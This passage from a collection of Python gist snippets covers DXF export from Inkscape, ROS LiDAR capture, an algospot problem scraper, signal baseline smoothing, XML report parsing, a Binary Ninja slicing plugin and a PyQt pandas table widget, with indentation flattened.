if field_spec and isinstance(field, serializers.ManyRelatedField):
child = field.child_relation
if isinstance(child, PullSerializerMixin):
model = child.get_pull_model()
field = self.get_pull_serializer(model, read_only=True, many=True)
serializer.fields[field_name] = field
elif child.queryset is None:
raise exceptions.NotAcceptable(
"Unable to resolve pull serializer on ManyRelatedField which have no queryset. "
"Try using the PullSerializerMixin to specify reverse relations. "
)
else:
model = child.queryset.model
field = self.get_pull_serializer(model, read_only=True, many=True)
serializer.fields[field_name] = field
elif field_spec and isinstance(field, serializers.RelatedField):
model = field.queryset.model
field = self.get_pull_serializer(model, read_only=True)
serializer.fields[field_name] = field
self.recursive_select_keys(field, field_spec)
```
#### File: hard-gists/ee9151b0ad985ca348cd/snippet.py
```python
import inkex, simplepath, simpletransform, cubicsuperpath, cspsubdiv, dxf_templates_b2, re
class MyEffect(inkex.Effect):
def __init__(self):
inkex.Effect.__init__(self)
self.dxf = ''
self.handle = 255
self.flatness = 0.1
def output(self):
print self.dxf
def dxf_add(self, str):
self.dxf += str
def dxf_insert_code(self, code, value):
self.dxf += code + "\n" + value + "\n"
def dxf_line(self,layer,csp):
self.dxf_insert_code( '0', 'LINE' )
self.dxf_insert_code( '8', layer )
self.dxf_insert_code( '62', '4' )
self.dxf_insert_code( '5', '%x' % self.handle )
self.dxf_insert_code( '100', 'AcDbEntity' )
self.dxf_insert_code( '100', 'AcDbLine' )
self.dxf_insert_code( '10', '%f' % csp[0][0] )
self.dxf_insert_code( '20', '%f' % csp[0][1] )
self.dxf_insert_code( '30', '0.0' )
self.dxf_insert_code( '11', '%f' % csp[1][0] )
self.dxf_insert_code( '21', '%f' % csp[1][1] )
self.dxf_insert_code( '31', '0.0' )
def dxf_point(self,layer,x,y):
self.dxf_insert_code( '0', 'POINT' )
self.dxf_insert_code( '8', layer )
self.dxf_insert_code( '62', '4' )
self.dxf_insert_code( '5', '%x' % self.handle )
self.dxf_insert_code( '100', 'AcDbEntity' )
self.dxf_insert_code( '100', 'AcDbPoint' )
self.dxf_insert_code( '10', '%f' % x )
self.dxf_insert_code( '20', '%f' % y )
self.dxf_insert_code( '30', '0.0' )
def dxf_path_to_lines(self,layer,p):
f = self.flatness
is_flat = 0
while is_flat < 1:
try:
cspsubdiv.cspsubdiv(p, self.flatness)
is_flat = 1
except:
f += 0.1
for sub in p:
for i in range(len(sub)-1):
self.handle += 1
s = sub[i]
e = sub[i+1]
self.dxf_line(layer,[s[1],e[1]])
def dxf_path_to_point(self,layer,p):
bbox = simpletransform.roughBBox(p)
x = (bbox[0] + bbox[1]) / 2
y = (bbox[2] + bbox[3]) / 2
self.dxf_point(layer,x,y)
def effect(self):
self.dxf_insert_code( '999', 'Inkscape export via "Better Better DXF Output" (http://tim.cexx.org/?p=590)' )
self.dxf_add( dxf_templates_b2.r14_header )
scale = 25.4/90.0
h = self.unittouu(self.document.getroot().xpath('@height',namespaces=inkex.NSS)[0])
path = '//svg:path'
# run thru entire document gathering a list of layers to generate a proper DXF LAYER table. There is probably a better way to do this.
layers=[];
for node in self.document.getroot().xpath(path, namespaces=inkex.NSS):
layer = node.getparent().get(inkex.addNS('label','inkscape'))
if layer == None:
layer = 'Default'
if not layer in layers:
layers.append(layer)
self.dxf_insert_code('0', 'TABLE')
self.dxf_insert_code('2', 'LAYER')
self.dxf_insert_code('5', '2')
self.dxf_insert_code('330', '0')
self.dxf_insert_code('100', 'AcDbSymbolTable')
# group code 70 tells a reader how many table records to expect (e.g. pre-allocate memory for).
# It must be greater or equal to the actual number of records
self.dxf_insert_code('70',str(len(layers)))
for layer in layers:
self.dxf_insert_code('0', 'LAYER')
self.dxf_insert_code('5', '10')
self.dxf_insert_code('330', '2')
self.dxf_insert_code('100', 'AcDbSymbolTableRecord')
self.dxf_insert_code('100', 'AcDbLayerTableRecord')
self.dxf_insert_code('2', layer)
self.dxf_insert_code('70', '0')
self.dxf_insert_code('62', '7')
self.dxf_insert_code('6', 'CONTINUOUS')
self.dxf_insert_code('0','ENDTAB')
self.dxf_insert_code('0','ENDSEC')
self.dxf_add( dxf_templates_b2.r14_blocks )
# Generate actual geometry...
for node in self.document.getroot().xpath(path,namespaces=inkex.NSS):
layer = node.getparent().get(inkex.addNS('label','inkscape'))
if layer == None:
layer = 'Default' # Layer 1
d = node.get('d')
p = cubicsuperpath.parsePath(d)
t = node.get('transform')
if t != None:
m = simpletransform.parseTransform(t)
simpletransform.applyTransformToPath(m,p)
m = [[scale,0,0],[0,-scale,h*scale]]
simpletransform.applyTransformToPath(m,p)
if re.search('drill$',layer,re.I) == None:
#if layer == 'Brackets Drill':
self.dxf_path_to_lines(layer,p)
else:
self.dxf_path_to_point(layer,p)
self.dxf_add( dxf_templates_b2.r14_footer )
e = MyEffect()
e.affect()
```
#### File: hard-gists/eeb156dc7b4caca69f5b31037da54708/snippet.py
```python
import sys
##sys.path.insert(0,'/opt/ros/kinetic/lib/python2.7/dist-packages')
##sys.path.insert(0,'/usr/lib/python2.7/dist-packages') ## rospkg
import os
#os.system('source /opt/ros/kinetic/setup.bash')
import numpy as np
import rospy
from sensor_msgs.msg import PointCloud2, PointField
#---------------------------------------------------------------------------------------------------------
# PointCloud2 to array
# https://gist.github.com/dlaz/11435820
# https://github.com/pirobot/ros-by-example/blob/master/rbx_vol_1/rbx1_apps/src/point_cloud2.py
# http://answers.ros.org/question/202787/using-pointcloud2-data-getting-xy-points-in-python/
# https://github.com/eric-wieser/ros_numpy/blob/master/src/ros_numpy/point_cloud2.py
# https://github.com/eric-wieser/ros_numpy #############################################################################################
DUMMY_FIELD_PREFIX = '__'
# mappings between PointField types and numpy types
type_mappings = [(PointField.INT8, np.dtype('int8')), (PointField.UINT8, np.dtype('uint8')), (PointField.INT16, np.dtype('int16')),
(PointField.UINT16, np.dtype('uint16')), (PointField.INT32, np.dtype('int32')), (PointField.UINT32, np.dtype('uint32')),
(PointField.FLOAT32, np.dtype('float32')), (PointField.FLOAT64, np.dtype('float64'))]
pftype_to_nptype = dict(type_mappings)
nptype_to_pftype = dict((nptype, pftype) for pftype, nptype in type_mappings)
# sizes (in bytes) of PointField types
pftype_sizes = {PointField.INT8: 1, PointField.UINT8: 1, PointField.INT16: 2, PointField.UINT16: 2,
PointField.INT32: 4, PointField.UINT32: 4, PointField.FLOAT32: 4, PointField.FLOAT64: 8}
def fields_to_dtype(fields, point_step):
'''
Convert a list of PointFields to a numpy record datatype.
'''
offset = 0
np_dtype_list = []
for f in fields:
while offset < f.offset:
# might be extra padding between fields
np_dtype_list.append(('%s%d' % (DUMMY_FIELD_PREFIX, offset), np.uint8))
offset += 1
dtype = pftype_to_nptype[f.datatype]
if f.count != 1:
dtype = np.dtype((dtype, f.count))
np_dtype_list.append((f.name, dtype))
offset += pftype_sizes[f.datatype] * f.count
# might be extra padding between points
while offset < point_step:
np_dtype_list.append(('%s%d' % (DUMMY_FIELD_PREFIX, offset), np.uint8))
offset += 1
return np_dtype_list
def msg_to_arr(msg):
dtype_list = fields_to_dtype(msg.fields, msg.point_step)
arr = np.fromstring(msg.data, dtype_list)
# remove the dummy fields that were added
arr = arr[[fname for fname, _type in dtype_list if not (fname[:len(DUMMY_FIELD_PREFIX)] == DUMMY_FIELD_PREFIX)]]
if msg.height == 1:
return np.reshape(arr, (msg.width,))
else:
return np.reshape(arr, (msg.height, msg.width))
##################################################################################################################################
lidar_dir = '/root/share/project/didi/data/didi/didi-2/Data/1/15/lidar'
##lidar_dir = '/root/share/project/didi/data/didi/didi-2/Out/Round_1_Test/19_f2/lidar'
def callback(msg):
timestamp = msg.header.stamp.to_nsec()
print('callback: msg : seq=%d, timestamp=%19d'%(
msg.header.seq, timestamp
))
arr= msg_to_arr(msg)
file=lidar_dir+'/%19d.npy'%(
timestamp
)
np.save(file,arr)
#dd=0
pass
if __name__=='__main__':
print( '%s: calling main function ... ' % os.path.basename(__file__))
if not os.path.exists(lidar_dir):
os.makedirs(lidar_dir)
rospy.init_node('velodyne_subscriber')
velodyne_subscriber = rospy.Subscriber('/velodyne_points', PointCloud2, callback)
rospy.spin()
print( 'success' )
```
#### File: hard-gists/ef9e5c352e54769c4d43/snippet.py
```python
import requests
from bs4 import BeautifulSoup as bs
from itertools import chain, filterfalse
langs = {'python': ['(py)', '(pypy)', '(py3)'],
'ruby': ['(rb)']}
def get_pids(maxpage=17):
""" gatter problem ids and return it one by one """
baseurl = 'https://algospot.com/judge/problem/list/%d'
for pagenum in range(1, maxpage+1):
page = requests.get(baseurl % pagenum, timeout=None)
soup = bs(page.text)
tds = soup.find_all('td', class_='id')
for p in tds:
yield p.find('a').text.strip()
def solved_with(lang):
""" return a filter that checks if provided problem is ever solved with the
language or not
"""
if lang not in langs:
raise
target = langs[lang]
baseurl = 'https://algospot.com/judge/problem/stat/%(pid)s/%(page)d/'
def f(pid):
firstpage = requests.get(baseurl % {'pid': pid, 'page': 1})
soup = bs(firstpage.text)
maxpage = soup.find('span', class_='step-links').find_all('a')[-1].text
for pagenum in range(1, int(maxpage)+1):
page = requests.get(baseurl % {'pid': pid, 'page': pagenum})
soup = bs(page.text)
tds = chain(soup.find_all('td', class_='fastest'),
soup.find_all('td', class_='shortest'))
ans = ''.join(td.text for td in tds)
if any(t in ans for t in target):
return True
return False
return f
def solved_by(uid):
""" return a filter that checks if provided problem is ever solved by the
user or not. user is specified by user id, shown in his profile page url.
for example user fleo0917(https://algospot.com/user/profile/13227)'s user
id is '13227'
"""
solved = set()
baseurl = 'https://algospot.com/judge/problem/list/%(page)d?verdict=solved&user_tried=%(uid)s'
firstpage = requests.get(baseurl % {'uid': uid, 'page': 1})
soup = bs(firstpage.text)
maxpage = soup.find('span', class_='step-links').find_all('a')[-1].text
for pagenum in range(1, int(maxpage)+1):
page = requests.get(baseurl % {'uid': uid, 'page': pagenum})
soup = bs(page.text)
tds = soup.find_all('td', class_='id')
for p in tds:
solved.add(p.find('a').text.strip())
def f(pid):
return pid in solved
return f
def gen_url(pid):
""" return problem definition url """
return 'https://algospot.com/judge/problem/read/%s' % pid
if __name__ == '__main__':
probs = get_pids()
probs = filter(solved_with('python'), probs)
probs = filterfalse(solved_by('13227'), probs)
for p in probs:
print('[%s](%s)' % (p, gen_url(p)))
```
#### File: hard-gists/efabc30c4b2c9afd8a83/snippet.py
```python
import numpy as np
from scipy.linalg import solveh_banded
def als_baseline(intensities, asymmetry_param=0.05, smoothness_param=1e6,
max_iters=10, conv_thresh=1e-5, verbose=False):
'''Computes the asymmetric least squares baseline.
* http://www.science.uva.nl/~hboelens/publications/draftpub/Eilers_2005.pdf
smoothness_param: Relative importance of smoothness of the predicted response.
asymmetry_param (p): if y > z, w = p, otherwise w = 1-p.
Setting p=1 is effectively a hinge loss.
'''
smoother = WhittakerSmoother(intensities, smoothness_param, deriv_order=2)
# Rename p for concision.
p = asymmetry_param
# Initialize weights.
w = np.ones(intensities.shape[0])
for i in xrange(max_iters):
z = smoother.smooth(w)
mask = intensities > z
new_w = p*mask + (1-p)*(~mask)
conv = np.linalg.norm(new_w - w)
if verbose:
print i+1, conv
if conv < conv_thresh:
break
w = new_w
else:
print 'ALS did not converge in %d iterations' % max_iters
return z
class WhittakerSmoother(object):
def __init__(self, signal, smoothness_param, deriv_order=1):
self.y = signal
assert deriv_order > 0, 'deriv_order must be an int > 0'
# Compute the fixed derivative of identity (D).
d = np.zeros(deriv_order*2 + 1, dtype=int)
d[deriv_order] = 1
d = np.diff(d, n=deriv_order)
n = self.y.shape[0]
k = len(d)
s = float(smoothness_param)
# Here be dragons: essentially we're faking a big banded matrix D,
# doing s * D.T.dot(D) with it, then taking the upper triangular bands.
diag_sums = np.vstack([
np.pad(s*np.cumsum(d[-i:]*d[:i]), ((k-i,0),), 'constant')
for i in xrange(1, k+1)])
upper_bands = np.tile(diag_sums[:,-1:], n)
upper_bands[:,:k] = diag_sums
for i,ds in enumerate(diag_sums):
upper_bands[i,-i-1:] = ds[::-1][:i+1]
self.upper_bands = upper_bands
def smooth(self, w):
foo = self.upper_bands.copy()
foo[-1] += w # last row is the diagonal
return solveh_banded(foo, w * self.y, overwrite_ab=True, overwrite_b=True)
```
#### File: hard-gists/f112560fd04ce43c53d4/snippet.py
```python
from xml.etree import ElementTree
from collections import defaultdict
from dateutil.parser import parse as datetime_parser
def read_report_from_file(filename):
with open(filename) as fsock:
return read_report_from_string(fsock.read())
def read_report_from_string(report_string):
xml_root = ElementTree.fromstring(report_string)
return Report(xml_root)
class Report(object):
def __init__(self, xml):
self._xml = xml
@property
def id(self):
return self._xml.get('id')
@property
def type(self):
return self._xml.get('type')
@property
def start(self):
return datetime_parser(self._xml.find('start').text, ignoretz=True)
@property
def end(self):
return datetime_parser(self._xml.find('end').text, ignoretz=True)
@property
def state(self):
return self._xml.find('state').text
@property
def resource(self):
return self._xml.find('resource').text
@property
def events(self):
return [Event(x) for x in self._xml.findall('event')]
@property
def events_by_type(self):
events_by_type = defaultdict(lambda: [])
for event in self.events:
events_by_type[event.command].append(event)
return events_by_type
def duration(self):
return self.end - self.start
def command_start_time(self, command, relative=False):
events_for_command = self.events_by_type[command]
command_start_time = events_for_command[0].time
return command_start_time - self.start if relative else command_start_time
class Event(object):
def __init__(self, xml):
self._xml = xml
@property
def command(self):
return self._xml.get('command')
@property
def time(self):
return datetime_parser(self._xml.find('time').text, ignoretz=True)
@property
def state(self):
return self._xml.find('state').text
def __repr__(self):
return "{0} {1} {2}".format(self.command, self.time, self.state)
```
#### File: hard-gists/f15921b2257af1db953f/snippet.py
```python
from datetime import datetime, timezone, timedelta
# usage: naturaltime.to_text(some_datetime)
def past(dt, dif):
if dif.days > 2:
return '%d days ago' % int(dif.days)
if dif.days > 1:
return 'yesterday at %s' % dt.strftime('%I:%M %p')
if dif.seconds <= 60:
return '%d seconds ago' % int(dif.seconds)
if dif.seconds <= (60 * 10):
return '%d minutes, %d seconds ago' % \
(int(dif.seconds / 60), int(dif.seconds) % 60)
if dif.seconds <= (60 * 60):
return 'about %d minutes ago' % int(dif.seconds / 60)
return '%d hours, %d minutes ago' % \
(int(dif.seconds / (60 * 60)), int(dif.seconds / 60) % 60)
def future(dt, dif):
if dif.days > 2:
return 'in %d days time' % int(dif.days)
if dif.days > 1:
return 'tomorrow at %s' % dt.strftime('%I:%M %p')
if dif.seconds <= 60:
return '%d seconds from now' % int(dif.seconds)
if dif.seconds <= (60 * 10):
return '%d minutes, %d seconds from now' % \
(int(dif.seconds / 60), int(dif.seconds) % 60)
if dif.seconds <= (60 * 60):
return 'about %d minutes from now' % int(dif.seconds / 60)
return '%d hours, %d minutes from now' % \
(int(dif.seconds / (60 * 60)), int(dif.seconds / 60) % 60)
def to_text(dt):
now = datetime.now(timezone.utc)
dif = dt - now
smalld = timedelta(seconds=5)
if dif < smalld:
if abs(dif) < smalld: return 'just now'
return past(dt, abs(dif))
else:
if abs(dif) < smalld: return 'now'
return future(dt, abs(dif))
```
#### File: hard-gists/f28b7a2d3356a0ed39823aaea66b50d0/snippet.py
```python
from binaryninja import (
SSAVariable, HighlightStandardColor, PluginCommand
)
def do_backward_slice(instruction, function):
# switch to SSA form (this does nothing if it's already SSA).
instruction_queue = set([instruction.ssa_form.instr_index])
visited_instructions = set()
variables = set()
while instruction_queue:
visit_index = instruction_queue.pop()
if visit_index is None or visit_index in visited_instructions:
continue
instruction_to_visit = function[visit_index]
if instruction_to_visit is None:
continue
for new_var in instruction_to_visit.vars_read:
instruction_queue.add(
function.get_ssa_var_definition(
new_var
)
)
variables.update(
[(var.var.identifier, var.version)
for var in instruction_to_visit.vars_read]
)
visited_instructions.add(visit_index)
return visited_instructions
def do_forward_slice(instruction, function):
# if the first operand is not an SSAVariable then we won't slice it.
if not isinstance(instruction.ssa_form.operands[0], SSAVariable):
return set()
variables = set()
operand = instruction.ssa_form.operands[0]
variables.add((operand.var.identifier, operand.version))
instruction_queue = set()
instruction_queue.update(
function.ssa_form.get_ssa_var_uses(
operand
)
)
visited_instructions = set()
visited_instructions.add(instruction.ssa_form.instr_index)
while instruction_queue:
visit_index = instruction_queue.pop()
if visit_index is None or visit_index in visited_instructions:
continue
instruction_to_visit = function[visit_index]
if instruction_to_visit is None:
continue
for new_var in instruction_to_visit.vars_written:
instruction_queue.update(
function.get_ssa_var_uses(
new_var
)
)
variables.add(
(new_var.var.identifier, new_var.version)
)
visited_instructions.add(visit_index)
return visited_instructions
def program_slice(instruction, direction, color=None):
function = instruction.function.ssa_form
bv = function.source_function.view
if color is None:
color = HighlightStandardColor.BlueHighlightColor
if direction == 'backward':
visited_instructions = do_backward_slice(instruction, function)
if direction == 'forward':
visited_instructions = do_forward_slice(instruction, function)
bv.begin_undo_actions()
for visited_instruction in visited_instructions:
function.source_function.set_user_instr_highlight(
function[visited_instruction].address,
color
)
bv.commit_undo_actions()
def backward_slice(bv, addr):
function = bv.get_basic_blocks_at(addr)[0].function
instruction = function.get_low_level_il_at(addr).mapped_medium_level_il
program_slice(instruction, 'backward')
def forward_slice(bv, addr):
function = bv.get_basic_blocks_at(addr)[0].function
instruction = function.get_low_level_il_at(addr).mapped_medium_level_il
program_slice(instruction, 'forward')
PluginCommand.register_for_address(
'Slice backwards',
'Slice variable backwards from this point',
backward_slice)
PluginCommand.register_for_address(
'Slice forward',
'Slice variable forward from this point',
forward_slice
)
```
#### File: hard-gists/f2bb0cc876828b54f2ed/snippet.py
```python
import sip
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
import pandas
import operator
from PyQt4 import QtGui, QtCore
import sys
from functools import partial
class WidgetedCell(object):
"""Set as the value of an element in a pandas DataFrame to create a widget
NOTE: You may also want your widget to implement the getWidgetedCellState and setWidgetedCellState
methods so that interactions with the controlls persist.
"""
def __init__(self, widget):
"""Create a widget in the DataFrameWidget's cell
Args:
widget (subclass of QWidget)
Widget to display in cell. The constructor of `widget` must
accept only one argument, the parent widget to
build `widget` inside of
"""
self.widget = widget
def __repr__(self):
return repr(self.widget)
class DataFrameModel(QtCore.QAbstractTableModel):
""" data model for a DataFrame class """
RawDataRole = 64 # Custom Role, http://qt-project.org/doc/qt-4.8/qt.html#ItemDataRole-enum
RawIndexRole = 65
def __init__(self):
super(DataFrameModel, self).__init__()
self._df = pandas.DataFrame()
self._orig_df = pandas.DataFrame()
self._pre_dyn_filter_df = None
self._resort = lambda : None # Null resort functon
def setDataFrame(self, dataFrame):
"""Set or change pandas DataFrame to show"""
self.df = dataFrame
self._orig_df = dataFrame.copy()
self._pre_dyn_filter_df = None # Clear dynamic filter
@property
def df(self):
return self._df
@df.setter
def df(self, dataFrame):
"""Setter should only be used internal to DataFrameModel. Others should use setDataFrame()"""
self.modelAboutToBeReset.emit()
self._df = dataFrame
self.modelReset.emit()
@QtCore.pyqtSlot()
def beginDynamicFilter(self):
"""Effects of using the "filter" function will not become permanent until endDynamicFilter called"""
if self._pre_dyn_filter_df is None:
print "NEW DYNAMIC FILTER MODEL"
self._pre_dyn_filter_df = self.df.copy()
else:
# Already dynamically filtering, so don't override that
print "SAME DYNAMIC FILTER MODEL"
pass
@QtCore.pyqtSlot()
def endDynamicFilter(self):
"""Makes permanent the effects of the dynamic filter"""
print " * * * RESETING DYNAMIC"
self._pre_dyn_filter_df = None
@QtCore.pyqtSlot()
def cancelDynamicFilter(self):
"""Cancel the dynamic filter"""
self.df = self._pre_dyn_filter_df.copy()
self._pre_dyn_filter_df = None
#------------- table display functions -----------------
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
if role != QtCore.Qt.DisplayRole:
return None
if orientation == QtCore.Qt.Horizontal:
try:
return '%s' % self.df.columns.tolist()[section]
except (IndexError, ):
return QtCore.QVariant()
elif orientation == QtCore.Qt.Vertical:
try:
return '%s' % self.df.index.tolist()[section]
except (IndexError, ):
return QtCore.QVariant()
def data(self, index, role=QtCore.Qt.DisplayRole):
#if role == QtCore.Qt.BackgroundRole:
# return QtGui.QColor(255,255,204)
if role in (QtCore.Qt.DisplayRole, DataFrameModel.RawDataRole, DataFrameModel.RawIndexRole):
if not index.isValid():
return QtCore.QVariant()
if role == DataFrameModel.RawIndexRole:
r = self.df.index[index.row()]
c = self.df.columns[index.column()]
return (r, c)
data = self.df.iloc[index.row(), index.column()]
if role == DataFrameModel.RawDataRole:
return data
if pandas.isnull(data):
return QtCore.QVariant()
return '%s' % data
else:
return None
def flags(self, index):
defaults = super(DataFrameModel, self).flags(index)
data = self.data(index, DataFrameModel.RawDataRole)
if isinstance(data, WidgetedCell):
return defaults | QtCore.Qt.ItemIsEditable
return defaults
def __setData(self, index, value, role):
row = self.df.index[index.row()]
col = self.df.columns[index.column()]
if hasattr(value, 'toPyObject'):
# PyQt4 gets a QVariant
value = value.toPyObject()
else:
# PySide gets an unicode
dtype = self.df[col].dtype
if dtype != object:
value = None if value == '' else dtype.type(value)
self.df.set_value(row, col, value)
self.dataChanged.emit()
return True
def rowCount(self, index=QtCore.QModelIndex()):
return self.df.shape[0]
def columnCount(self, index=QtCore.QModelIndex()):
return self.df.shape[1]
def sort(self, col_ix, order = QtCore.Qt.AscendingOrder):
if col_ix >= self.df.shape[1]:
# Column out of bounds
return
self.layoutAboutToBeChanged.emit()
ascending = True if order == QtCore.Qt.AscendingOrder else False
self.df = self.df.sort(self.df.columns[col_ix], ascending=ascending)
self.layoutChanged.emit()
# Set sorter to current sort (for future filtering)
self._resort = partial(self.sort, col_ix, order)
def filter(self, col_ix, needle):
"""Filter DataFrame view. Case Insenstive.
Fitlers the DataFrame view to include only rows who's value in col
contains the needle. EX: a needle of "Ab" will show rows with
"absolute" and "REABSOLVE".
Args:
col_ix (int)
Column index in df to filter
needle (str)
String to search df_view for
"""
if self._pre_dyn_filter_df is not None:
df = self._pre_dyn_filter_df.copy()
else:
df = self.df
col = df.columns[col_ix]
# Create lowercase string version of column as series
s_lower = df[col].astype('str').str.lower()
# Make needle lower case too
needle = str(needle).lower()
# Actually filter
self.df = df[s_lower.str.contains(str(needle))]
# Resort
self._resort()
def filterIsIn(self, col_ix, include):
df = self._orig_df
col = self.df.columns[col_ix]
# Convert to string
s_col = df[col].astype('str')
# Filter
self.df = df[s_col.isin(include)]
# Resort
self._resort()
def filterFunction(self, col_ix, function):
df = self.df
col = self.df.columns[col_ix]
self.df = df[function(df[col])]
# Resort
self._resort()
def reset(self):
self.df = self._orig_df.copy()
self._resort = lambda: None
self._pre_dyn_filter_df = None
class DataFrameSortFilterProxyModel(QtGui.QSortFilterProxyModel):
def __init__(self):
super(DataFrameSortFilterProxyModel, self).__init__()
self._accepted_rows = []
self._source_df = None
self._refilter = lambda: None
def setSourceModel(self, source_model):
super(DataFrameSortFilterProxyModel, self).setSourceModel(source_model)
source_model.modelReset.connect(self._source_model_changed)
self._source_model_changed()
def sort(self, *args):
# Delegate sorting to the underyling model
self.sourceModel().sort(*args)
def _source_model_changed(self):
self._source_df = self.sourceModel().df
# Accept all rows
self._accepted_rows = xrange(0, self._source_df.shape[0])
print "SOURCE MODEL CHANGED", len(self._accepted_rows)
if len(self._accepted_rows) > 0:
self.setFilterString('') # Reset the filter
self._refilter()
def setFilterString(self, needle):
"""Filter DataFrame using df[col].str.contains(needle). Case insensitive."""
df = self._source_df
col = df.columns[self.filterKeyColumn()]
# Create lowercase string version of column as series
s_lower = df[col].astype('str').str.lower()
# Make needle lower case too
needle = str(needle).lower()
mask = s_lower.str.contains(str(needle))
self._filter_using_mask(mask)
self._refilter = partial(self.setFilterString, needle)
def setFilterList(self, filter_list):
"""Filter DataFrame using df[col].isin(filter_list)."""
df = self._source_df
col = df.columns[self.filterKeyColumn()]
mask = df[col].isin(filter_list)
self._filter_using_mask(mask)
def setFilterFunction(self, func):
"""Filter DataFrame using df[col].apply(func). Func should return True or False"""
df = self._source_df
col = df.columns[self.filterKeyColumn()]
mask = df[col].apply(func)
self._filter_using_mask(mask)
def _filter_using_mask(self, mask):
# Actually filter (need *locations* of filtered values)
df = self._source_df
col = df.columns[self.filterKeyColumn()]
ilocs = pandas.DataFrame(range(len(df)))
ilocs = ilocs[mask.reset_index(drop=True)]
self.modelAboutToBeReset.emit()
self._accepted_rows = ilocs.index
self.modelReset.emit()
@property
def df(self):
return self._source_df.iloc[self._accepted_rows]
@df.setter
def df(self, val):
raise AttributeError("Tried to set the dataframe of DataFrameSortFilterProxyModel")
def filterAcceptsRow(self, row, idx):
return row in self._accepted_rows
def filterAcceptsColumn(self, col, idx):
# Columns are hidden manually. No need for this
return True
def setFilterRegExp(self, *args):
raise NotImplementedError("Use setFilterString, setFilterList, or setFilterFunc instead")
def setFilterWildcard(self, *args):
raise NotImplementedError("Use setFilterString, setFilterList, or setFilterFunc instead")
def setFilterFixedString(self, *args):
raise NotImplementedError("Use setFilterString, setFilterList, or setFilterFunc instead")
class DynamicFilterLineEdit(QtGui.QLineEdit):
"""Filter textbox for a DataFrameTable"""
def __init__(self, *args, **kwargs):
self._always_dynamic = kwargs.pop('always_dynamic', False)
super(DynamicFilterLineEdit, self).__init__(*args, **kwargs)
self.col_to_filter = None
self._orig_df = None
self._host = None
def bind_dataframewidget(self, host, col_ix):
"""Bind tihs DynamicFilterLineEdit to a DataFrameTable's column
Args:
host (DataFrameWidget)
Host to filter
col_ix (int)
Index of column of host to filter
"""
self.host = host
self.col_to_filter = col_ix
self.textChanged.connect(self._update_filter)
@property
def host(self):
if self._host is None:
raise RuntimeError("Must call bind_dataframewidget() "
"before use.")
else:
return self._host
@host.setter
def host(self, value):
if not isinstance(value, DataFrameWidget):
raise ValueError("Must bind to a DataFrameWidget, not %s" % value)
else:
self._host = value
if not self._always_dynamic:
self.editingFinished.connect(self._host._data_model.endDynamicFilter)
def focusInEvent(self, QFocusEvent):
self._host._data_model.beginDynamicFilter()
def _update_filter(self, text):
"""Called everytime we type in the filter box"""
col_ix = self.col_to_filter
self.host.filter(col_ix, text)
class DynamicFilterMenuAction(QtGui.QWidgetAction):
"""Filter textbox in column-header right-click menu"""
def __init__(self, parent, menu, col_ix):
"""Filter textbox in column right-click menu
Args:
parent (DataFrameWidget)
Parent who owns the DataFrame to filter
menu (QMenu)
Menu object I am located on
col_ix (int)
Index of column used in pandas DataFrame we are to filter
"""
super(DynamicFilterMenuAction, self).__init__(parent)
# State
self.parent_menu = menu
# Build Widgets
widget = QtGui.QWidget()
layout = QtGui.QHBoxLayout()
self.label = QtGui.QLabel('Filter')
self.text_box = DynamicFilterLineEdit()
self.text_box.bind_dataframewidget(self.parent(), col_ix)
self.text_box.returnPressed.connect(self._close_menu)
layout.addWidget(self.label)
layout.addWidget(self.text_box)
widget.setLayout(layout)
self.setDefaultWidget(widget)
def _close_menu(self):
"""Gracefully handle menu"""
self.parent_menu.close()
class FilterListMenuWidget(QtGui.QWidgetAction):
"""Filter textbox in column-right click menu"""
def __init__(self, parent, menu, col_ix):
"""Filter textbox in column right-click menu
Args:
parent (DataFrameWidget)
Parent who owns the DataFrame to filter
menu (QMenu)
Menu object I am located on
col_ix (int)
Column index used in pandas DataFrame we are to filter
label (str)
Label in popup menu
"""
super(FilterListMenuWidget, self).__init__(parent)
# State
self.menu = menu
self.col_ix = col_ix
# Build Widgets
widget = QtGui.QWidget()
layout = QtGui.QVBoxLayout()
self.list = QtGui.QListWidget()
self.list.setFixedHeight(100)
layout.addWidget(self.list)
widget.setLayout(layout)
self.setDefaultWidget(widget)
# Signals/slots
self.list.itemChanged.connect(self.on_list_itemChanged)
self.parent().dataFrameChanged.connect(self._populate_list)
self._populate_list(inital=True)
def _populate_list(self, inital=False):
self.list.clear()
df = self.parent()._data_model._orig_df
col = df.columns[self.col_ix]
full_col = set(df[col]) # All Entries possible in this column
disp_col = set(self.parent().df[col]) # Entries currently displayed
def _build_item(item, state=None):
i = QtGui.QListWidgetItem('%s' % item)
i.setFlags(i.flags() | QtCore.Qt.ItemIsUserCheckable)
if state is None:
if item in disp_col:
state = QtCore.Qt.Checked
else:
state = QtCore.Qt.Unchecked
i.setCheckState(state)
i.checkState()
self.list.addItem(i)
return i
# Add a (Select All)
if full_col == disp_col:
select_all_state = QtCore.Qt.Checked
else:
select_all_state = QtCore.Qt.Unchecked
self._action_select_all = _build_item('(Select All)', state=select_all_state)
# Add filter items
if inital:
build_list = full_col
else:
build_list = disp_col
for i in sorted(build_list):
_build_item(i)
# Add a (Blanks)
# TODO
def on_list_itemChanged(self, item):
###
# Figure out what "select all" check-box state should be
###
self.list.blockSignals(True)
if item is self._action_select_all:
# Handle "select all" item click
if item.checkState() == QtCore.Qt.Checked:
state = QtCore.Qt.Checked
else:
state = QtCore.Qt.Unchecked
# Select/deselect all items
for i in range(self.list.count()):
if i is self._action_select_all: continue
i = self.list.item(i)
i.setCheckState(state)
else:
# Non "select all" item; figure out what "select all" should be
if item.checkState() == QtCore.Qt.Unchecked:
self._action_select_all.setCheckState(QtCore.Qt.Unchecked)
else:
# "select all" only checked if all other items are checked
for i in range(self.list.count()):
i = self.list.item(i)
if i is self._action_select_all: continue
if i.checkState() == QtCore.Qt.Unchecked:
self._action_select_all.setCheckState(QtCore.Qt.Unchecked)
break
else:
self._action_select_all.setCheckState(QtCore.Qt.Checked)
self.list.blockSignals(False)
###
# Filter dataframe according to list
###
include = []
for i in range(self.list.count()):
i = self.list.item(i)
if i is self._action_select_all: continue
if i.checkState() == QtCore.Qt.Checked:
include.append(str(i.text()))
self.parent().blockSignals(True)
self.parent().filterIsIn(self.col_ix, include)
self.parent().blockSignals(False)
self.parent()._enable_widgeted_cells()
class DataFrameItemDelegate(QtGui.QStyledItemDelegate):
"""Implements WidgetedCell"""
def __init__(self):
super(DataFrameItemDelegate, self).__init__()
self._cell_widget_states = {}
def createEditor(self, parent, option, index):
data = index.data(DataFrameModel.RawDataRole)
true_index = index.data(DataFrameModel.RawIndexRole)
